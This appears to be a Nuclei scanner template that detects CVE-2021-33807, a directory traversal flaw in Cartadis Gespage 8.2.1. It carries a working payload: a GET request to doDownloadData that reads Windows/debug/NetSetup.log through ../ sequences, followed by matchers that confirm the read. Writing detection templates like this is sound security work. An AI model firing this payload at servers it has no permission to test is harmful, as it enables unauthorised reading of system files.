39 lines
1.0 KiB
YAML
39 lines
1.0 KiB
YAML
id: CVE-2021-33807
|
|
|
|
info:
|
|
name: Cartadis Gespage 8.2.1 - Directory Traversal
|
|
author: daffainfo
|
|
severity: high
|
|
description: Cartadis Gespage through 8.2.1 allows Directory Traversal in gespage/doDownloadData and gespage/webapp/doDownloadData.
|
|
reference:
|
|
- https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_gespage_-_cve-2021-33807.pdf
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33807
|
|
tags: cve,cve2021,lfi,gespage
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.50
|
|
cve-id: CVE-2021-33807
|
|
cwe-id: CWE-22
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: word
|
|
words:
|
|
- "NetpDoDomainJoin:"
|
|
part: body
|
|
|
|
- type: word
|
|
words:
|
|
- "application/octet-stream"
|
|
part: header
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|